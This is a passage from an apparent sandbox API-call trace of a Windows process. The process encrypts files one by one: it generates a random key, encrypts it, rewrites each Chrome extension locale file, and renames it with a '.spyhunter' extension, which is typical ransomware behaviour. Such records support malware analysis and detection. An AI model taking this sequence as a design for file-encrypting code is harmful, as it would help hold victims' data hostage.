"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.spyhunter")) returned 1 [0136.548] GetProcessHeap () returned 0x2c0000 [0136.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.548] GetProcessHeap () returned 0x2c0000 [0136.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.549] GetProcessHeap () returned 0x2c0000 [0136.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0136.550] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f240 | out: pbBuffer=0x270f240) returned 1 [0136.550] GetProcessHeap () returned 0x2c0000 [0136.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.550] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f238*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f238*=0x30) returned 1 [0136.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json") returned 155 [0136.552] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.552] GetProcessHeap () returned 0x2c0000 [0136.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.552] ReadFile (in: hFile=0x18c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f1fc*=0x11a, lpOverlapped=0x0) returned 1 [0136.554] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.554] WriteFile (in: hFile=0x18c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x270f1fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f1fc*=0x11a, lpOverlapped=0x0) returned 1 [0136.554] GetProcessHeap () returned 0x2c0000 [0136.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.554] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.554] WriteFile (in: hFile=0x18c, lpBuffer=0x270f23c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1fc, lpOverlapped=0x0 | out: lpBuffer=0x270f23c*, lpNumberOfBytesWritten=0x270f1fc*=0x4, lpOverlapped=0x0) returned 1 [0136.554] WriteFile (in: hFile=0x18c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1fc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1fc*=0x30, lpOverlapped=0x0) returned 1 [0136.554] CloseHandle (hObject=0x18c) returned 1 [0136.554] GetProcessHeap () returned 0x2c0000 [0136.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.555] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.spyhunter") returned 165 [0136.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.spyhunter")) returned 1 [0136.557] GetProcessHeap () returned 0x2c0000 [0136.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.557] GetProcessHeap () returned 0x2c0000 [0136.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.557] GetProcessHeap () returned 0x2c0000 [0136.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d3d8 | out: hHeap=0x2c0000) returned 1 [0136.558] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f238 | out: pbBuffer=0x270f238) returned 1 [0136.558] GetProcessHeap () returned 0x2c0000 [0136.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.559] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f230*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f230*=0x30) returned 1 [0136.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.579] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json") returned 155 [0136.579] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.579] GetProcessHeap () returned 0x2c0000 [0136.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.579] ReadFile (in: hFile=0x18c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f1f4*=0xd8, lpOverlapped=0x0) returned 1 [0136.580] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.580] WriteFile (in: hFile=0x18c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x270f1f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f1f4*=0xd8, lpOverlapped=0x0) returned 1 [0136.580] GetProcessHeap () returned 0x2c0000 [0136.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.580] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.580] WriteFile (in: hFile=0x18c, lpBuffer=0x270f234*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1f4, lpOverlapped=0x0 | out: lpBuffer=0x270f234*, lpNumberOfBytesWritten=0x270f1f4*=0x4, lpOverlapped=0x0) returned 1 [0136.580] WriteFile (in: hFile=0x18c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1f4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1f4*=0x30, lpOverlapped=0x0) returned 1 [0136.580] CloseHandle (hObject=0x18c) returned 1 [0136.581] GetProcessHeap () returned 0x2c0000 [0136.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.581] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.spyhunter") returned 165 [0136.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json.spyhunter")) returned 1 [0136.581] GetProcessHeap () returned 0x2c0000 [0136.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.582] GetProcessHeap () returned 0x2c0000 [0136.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.582] GetProcessHeap () returned 0x2c0000 [0136.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d6e8 | out: hHeap=0x2c0000) returned 1 [0136.583] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f230 | out: pbBuffer=0x270f230) returned 1 [0136.583] GetProcessHeap () returned 0x2c0000 [0136.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.583] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f228*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f228*=0x30) returned 1 [0136.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.584] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json") returned 155 [0136.584] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.584] GetProcessHeap () returned 0x2c0000 [0136.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.584] ReadFile (in: hFile=0x18c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f1ec*=0xd7, lpOverlapped=0x0) returned 1 [0136.585] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.585] WriteFile (in: hFile=0x18c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x270f1ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f1ec*=0xd7, lpOverlapped=0x0) returned 1 [0136.585] GetProcessHeap () returned 0x2c0000 [0136.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.585] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.585] WriteFile (in: hFile=0x18c, lpBuffer=0x270f22c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1ec, lpOverlapped=0x0 | out: lpBuffer=0x270f22c*, lpNumberOfBytesWritten=0x270f1ec*=0x4, lpOverlapped=0x0) returned 1 [0136.585] WriteFile (in: hFile=0x18c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1ec, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1ec*=0x30, lpOverlapped=0x0) returned 1 [0136.586] CloseHandle (hObject=0x18c) returned 1 [0136.586] GetProcessHeap () returned 0x2c0000 [0136.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.586] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.spyhunter") returned 165 [0136.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json.spyhunter")) returned 1 [0136.587] GetProcessHeap () returned 0x2c0000 [0136.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.587] GetProcessHeap () returned 0x2c0000 [0136.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.588] GetProcessHeap () returned 0x2c0000 [0136.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d870 | out: hHeap=0x2c0000) returned 1 [0136.590] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f228 | out: pbBuffer=0x270f228) returned 1 [0136.590] GetProcessHeap () returned 0x2c0000 [0136.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.590] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f220*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f220*=0x30) returned 1 [0136.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json") returned 155 [0136.590] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.590] GetProcessHeap () returned 0x2c0000 [0136.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.590] ReadFile (in: hFile=0x18c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f1e4*=0xeb, lpOverlapped=0x0) returned 1 [0136.591] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.592] WriteFile (in: hFile=0x18c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x270f1e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f1e4*=0xeb, lpOverlapped=0x0) returned 1 [0136.592] GetProcessHeap () returned 0x2c0000 [0136.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.592] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.592] WriteFile (in: hFile=0x18c, lpBuffer=0x270f224*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1e4, lpOverlapped=0x0 | out: lpBuffer=0x270f224*, lpNumberOfBytesWritten=0x270f1e4*=0x4, lpOverlapped=0x0) returned 1 [0136.594] WriteFile (in: hFile=0x18c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1e4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1e4*=0x30, lpOverlapped=0x0) returned 1 [0136.594] CloseHandle (hObject=0x18c) returned 1 [0136.594] GetProcessHeap () returned 0x2c0000 [0136.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.594] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.spyhunter") returned 165 [0136.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json.spyhunter")) returned 1 [0136.595] GetProcessHeap () returned 0x2c0000 [0136.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.595] GetProcessHeap () returned 0x2c0000 [0136.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.595] GetProcessHeap () returned 0x2c0000 [0136.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d560 | out: hHeap=0x2c0000) returned 1 [0136.597] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f220 | out: pbBuffer=0x270f220) returned 1 [0136.597] GetProcessHeap () returned 0x2c0000 [0136.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.597] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f218*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f218*=0x30) returned 1 [0136.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json") returned 155 [0136.597] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.597] GetProcessHeap () returned 0x2c0000 [0136.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.598] ReadFile (in: hFile=0x18c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f1dc*=0xee, lpOverlapped=0x0) returned 1 [0136.627] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.627] WriteFile (in: hFile=0x18c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x270f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f1dc*=0xee, lpOverlapped=0x0) returned 1 [0136.628] GetProcessHeap () returned 0x2c0000 [0136.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.628] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.628] WriteFile (in: hFile=0x18c, lpBuffer=0x270f21c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f1dc, lpOverlapped=0x0 | out: lpBuffer=0x270f21c*, lpNumberOfBytesWritten=0x270f1dc*=0x4, lpOverlapped=0x0) returned 1 [0136.628] WriteFile (in: hFile=0x18c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f1dc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f1dc*=0x30, lpOverlapped=0x0) returned 1 [0136.628] CloseHandle (hObject=0x18c) returned 1 [0136.628] GetProcessHeap () returned 0x2c0000 [0136.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.628] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.spyhunter") returned 165 [0136.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.spyhunter")) returned 1 [0136.629] GetProcessHeap () returned 0x2c0000 [0136.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.629] GetProcessHeap () returned 0x2c0000 [0136.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.629] GetProcessHeap () returned 0x2c0000 [0136.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d250 | out: hHeap=0x2c0000) returned 1 [0136.630] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f218 | out: pbBuffer=0x270f218) returned 1 [0136.630] GetProcessHeap () returned 0x2c0000 [0136.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.630] CryptEncrypt (in: hKey=0x2d4db8, 